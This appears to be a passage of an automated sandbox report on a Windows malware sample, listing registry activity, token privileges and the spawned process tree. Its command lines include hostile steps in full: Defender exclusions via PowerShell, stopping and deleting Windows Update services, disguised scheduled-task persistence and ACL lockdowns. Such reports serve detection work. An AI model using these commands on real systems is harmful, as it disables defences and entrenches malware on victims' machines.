| Key value enumerated | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Windows\SysWOW64\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information | C:\Windows\SysWOW64\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor | C:\Windows\SysWOW64\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\aced79f4-3d76-4c70-8dc0-eac8de58b3df\build2.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\94026adb-efcc-455e-99b8-0d84069a3182\build2.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\1eec4f0b-5e84-4f61-aa75-786176840be9\build2.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\VendorIdentifier | C:\Windows\SysWOW64\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\system32\dllhost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Previous Update Revision | C:\Windows\SysWOW64\svchost.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Previous Update Revision | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\aced79f4-3d76-4c70-8dc0-eac8de58b3df\build2.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\SysWOW64\svchost.exe | N/A |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout = 13000000000000000000000020000000100000000000000001000000010700005e01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Software\Microsoft\Internet Explorer\Toolbar | C:\Windows\Explorer.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\Locked = "1" | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser | C:\Windows\Explorer.EXE | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0 = 4e003100000000007c56611c100054656d7000003a0009000400efbe545690a57c56611c2e00000000000000000000000000000000000000000000000000d8dbbf00540065006d007000000014000000 | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1 | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings | C:\Windows\system32\rundll32.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell | C:\Windows\system32\rundll32.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 00000000ffffffff | C:\Windows\Explorer.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\NodeSlot = "1" | C:\Windows\Explorer.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 = 820074001c0043465346160031000000000000000000100041707044617461000000741a595e96dfd3488d671733bcee28bac5cdfadf9f6756418947c5c76bc0b67f400009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004100700070004400610074006100000042000000 | C:\Windows\Explorer.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots | C:\Windows\Explorer.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff | C:\Windows\Explorer.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\MRUListEx = ffffffff | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU | C:\Windows\system32\rundll32.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0 | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU | C:\Windows\Explorer.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0 = 50003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014000000 | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0 | C:\Windows\Explorer.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\MRUListEx = 00000000ffffffff | C:\Windows\Explorer.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff | C:\Windows\system32\rundll32.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = 00000000ffffffff | C:\Windows\Explorer.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots | C:\Windows\system32\rundll32.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 | C:\Windows\Explorer.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff | C:\Windows\Explorer.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02 | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags | C:\Windows\Explorer.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\SniffedFolderType = "Generic" | C:\Windows\Explorer.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 = 14001f44471a0359723fa74489c55595fe6b30ee0000 | C:\Windows\Explorer.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\761c71f8126a6f6cb6c40f60492d463a2614e63ed6434a67d6998dccdd5aad70.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\3C23.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\powercfg.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
outlook_office_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Windows\SysWOW64\rundll32.exe | N/A |
outlook_win_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Windows\SysWOW64\rundll32.exe | N/A |
Processes
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Users\Admin\AppData\Local\Temp\761c71f8126a6f6cb6c40f60492d463a2614e63ed6434a67d6998dccdd5aad70.exe
"C:\Users\Admin\AppData\Local\Temp\761c71f8126a6f6cb6c40f60492d463a2614e63ed6434a67d6998dccdd5aad70.exe"
C:\Users\Admin\AppData\Local\Temp\223.exe
C:\Users\Admin\AppData\Local\Temp\223.exe
C:\Users\Admin\AppData\Local\Temp\223.exe
C:\Users\Admin\AppData\Local\Temp\223.exe
C:\Users\Admin\AppData\Local\Temp\447.exe
C:\Users\Admin\AppData\Local\Temp\447.exe
C:\Users\Admin\AppData\Local\Temp\447.exe
C:\Users\Admin\AppData\Local\Temp\447.exe
C:\Users\Admin\AppData\Local\Temp\810.exe
C:\Users\Admin\AppData\Local\Temp\810.exe
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Users\Admin\AppData\Local\0ed36631-a8e4-4f70-b931-251fc97814c5" /deny *S-1-1-0:(OI)(CI)(DE,DC)
C:\Users\Admin\AppData\Local\Temp\447.exe
"C:\Users\Admin\AppData\Local\Temp\447.exe" --Admin IsNotAutoStart IsNotTask
C:\Users\Admin\AppData\Local\Temp\447.exe
"C:\Users\Admin\AppData\Local\Temp\447.exe" --Admin IsNotAutoStart IsNotTask
C:\Users\Admin\AppData\Local\Temp\257D.exe
C:\Users\Admin\AppData\Local\Temp\257D.exe
C:\Users\Admin\AppData\Local\94026adb-efcc-455e-99b8-0d84069a3182\build2.exe
"C:\Users\Admin\AppData\Local\94026adb-efcc-455e-99b8-0d84069a3182\build2.exe"
C:\Users\Admin\AppData\Local\Temp\257D.exe
C:\Users\Admin\AppData\Local\Temp\257D.exe
C:\Users\Admin\AppData\Local\Temp\257D.exe
"C:\Users\Admin\AppData\Local\Temp\257D.exe" --Admin IsNotAutoStart IsNotTask
C:\Users\Admin\AppData\Local\94026adb-efcc-455e-99b8-0d84069a3182\build3.exe
"C:\Users\Admin\AppData\Local\94026adb-efcc-455e-99b8-0d84069a3182\build3.exe"
C:\Windows\SysWOW64\schtasks.exe
/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"
C:\Users\Admin\AppData\Local\Temp\257D.exe
"C:\Users\Admin\AppData\Local\Temp\257D.exe" --Admin IsNotAutoStart IsNotTask
C:\Users\Admin\AppData\Local\94026adb-efcc-455e-99b8-0d84069a3182\build2.exe
"C:\Users\Admin\AppData\Local\94026adb-efcc-455e-99b8-0d84069a3182\build2.exe"
C:\Users\Admin\AppData\Local\Temp\37CD.exe
C:\Users\Admin\AppData\Local\Temp\37CD.exe
C:\Users\Admin\AppData\Local\Temp\37CD.exe
C:\Users\Admin\AppData\Local\Temp\37CD.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
C:\Users\Admin\AppData\Local\Temp\3C23.exe
C:\Users\Admin\AppData\Local\Temp\3C23.exe
C:\Users\Admin\AppData\Local\7e34cc26-e0c1-4020-8848-47aca11b85ea\build2.exe
"C:\Users\Admin\AppData\Local\7e34cc26-e0c1-4020-8848-47aca11b85ea\build2.exe"
C:\Windows\SysWOW64\schtasks.exe
/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"
C:\Users\Admin\AppData\Local\Temp\3D9B.exe
C:\Users\Admin\AppData\Local\Temp\3D9B.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 1196 -ip 1196
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1196 -s 340
C:\Users\Admin\AppData\Local\Temp\3FFE.exe
C:\Users\Admin\AppData\Local\Temp\3FFE.exe
C:\Users\Admin\AppData\Local\7e34cc26-e0c1-4020-8848-47aca11b85ea\build2.exe
"C:\Users\Admin\AppData\Local\7e34cc26-e0c1-4020-8848-47aca11b85ea\build2.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 4752 -ip 4752
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4752 -s 340
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 2520 -ip 2520
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2520 -s 340
C:\Users\Admin\AppData\Local\Temp\4147.exe
C:\Users\Admin\AppData\Local\Temp\4147.exe
C:\Users\Admin\AppData\Local\7e34cc26-e0c1-4020-8848-47aca11b85ea\build3.exe
"C:\Users\Admin\AppData\Local\7e34cc26-e0c1-4020-8848-47aca11b85ea\build3.exe"
C:\Users\Admin\AppData\Local\Temp\4AAE.exe
C:\Users\Admin\AppData\Local\Temp\4AAE.exe
C:\Users\Admin\AppData\Local\Temp\Player3.exe
"C:\Users\Admin\AppData\Local\Temp\Player3.exe"
C:\Users\Admin\AppData\Local\Temp\ss31.exe
"C:\Users\Admin\AppData\Local\Temp\ss31.exe"
C:\Users\Admin\AppData\Local\Temp\51B4.exe
C:\Users\Admin\AppData\Local\Temp\51B4.exe
C:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exe
"C:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exe"
C:\Users\Admin\AppData\Local\Temp\XandETC.exe
"C:\Users\Admin\AppData\Local\Temp\XandETC.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 2848 -ip 2848
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2848 -s 812
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN nbveek.exe /TR "C:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exe" /F
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "nbveek.exe" /P "Admin:N"&&CACLS "nbveek.exe" /P "Admin:R" /E&&echo Y|CACLS "..\16de06bfb4" /P "Admin:N"&&CACLS "..\16de06bfb4" /P "Admin:R" /E&&Exit
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
C:\Windows\SysWOW64\cacls.exe
CACLS "nbveek.exe" /P "Admin:N"
C:\Windows\SysWOW64\cacls.exe
CACLS "nbveek.exe" /P "Admin:R" /E
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
C:\Windows\SysWOW64\cacls.exe
CACLS "..\16de06bfb4" /P "Admin:N"
C:\Users\Admin\AppData\Local\Temp\223.exe
"C:\Users\Admin\AppData\Local\Temp\223.exe" --Admin IsNotAutoStart IsNotTask
C:\Users\Admin\AppData\Local\Temp\223.exe
"C:\Users\Admin\AppData\Local\Temp\223.exe" --Admin IsNotAutoStart IsNotTask
C:\Windows\SysWOW64\cacls.exe
CACLS "..\16de06bfb4" /P "Admin:R" /E
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 4168 -ip 4168
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4168 -s 1856
C:\Windows\system32\dllhost.exe
"C:\Windows\system32\dllhost.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 2476 -ip 2476
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2476 -s 700
C:\Users\Admin\AppData\Local\1eec4f0b-5e84-4f61-aa75-786176840be9\build2.exe
"C:\Users\Admin\AppData\Local\1eec4f0b-5e84-4f61-aa75-786176840be9\build2.exe"
C:\Users\Admin\AppData\Local\1eec4f0b-5e84-4f61-aa75-786176840be9\build3.exe
"C:\Users\Admin\AppData\Local\1eec4f0b-5e84-4f61-aa75-786176840be9\build3.exe"
C:\Users\Admin\AppData\Local\1eec4f0b-5e84-4f61-aa75-786176840be9\build2.exe
"C:\Users\Admin\AppData\Local\1eec4f0b-5e84-4f61-aa75-786176840be9\build2.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 4728 -ip 4728
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4728 -s 1780
C:\Users\Admin\AppData\Local\Temp\37CD.exe
"C:\Users\Admin\AppData\Local\Temp\37CD.exe" --Admin IsNotAutoStart IsNotTask
C:\Users\Admin\AppData\Local\Temp\37CD.exe
"C:\Users\Admin\AppData\Local\Temp\37CD.exe" --Admin IsNotAutoStart IsNotTask
C:\Users\Admin\AppData\Local\aced79f4-3d76-4c70-8dc0-eac8de58b3df\build2.exe
"C:\Users\Admin\AppData\Local\aced79f4-3d76-4c70-8dc0-eac8de58b3df\build2.exe"
C:\Users\Admin\AppData\Local\aced79f4-3d76-4c70-8dc0-eac8de58b3df\build3.exe
"C:\Users\Admin\AppData\Local\aced79f4-3d76-4c70-8dc0-eac8de58b3df\build3.exe"
C:\Users\Admin\AppData\Local\Temp\A9F7.exe
C:\Users\Admin\AppData\Local\Temp\A9F7.exe
C:\Users\Admin\AppData\Local\aced79f4-3d76-4c70-8dc0-eac8de58b3df\build2.exe
"C:\Users\Admin\AppData\Local\aced79f4-3d76-4c70-8dc0-eac8de58b3df\build2.exe"
C:\Windows\SysWOW64\rundll32.exe
C:\Windows\system32\rundll32.exe C:\Users\Admin\AppData\Local\Temp\Ddpedoqywwaftue.dll,start
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 388 -p 4764 -ip 4764
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4764 -s 480
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
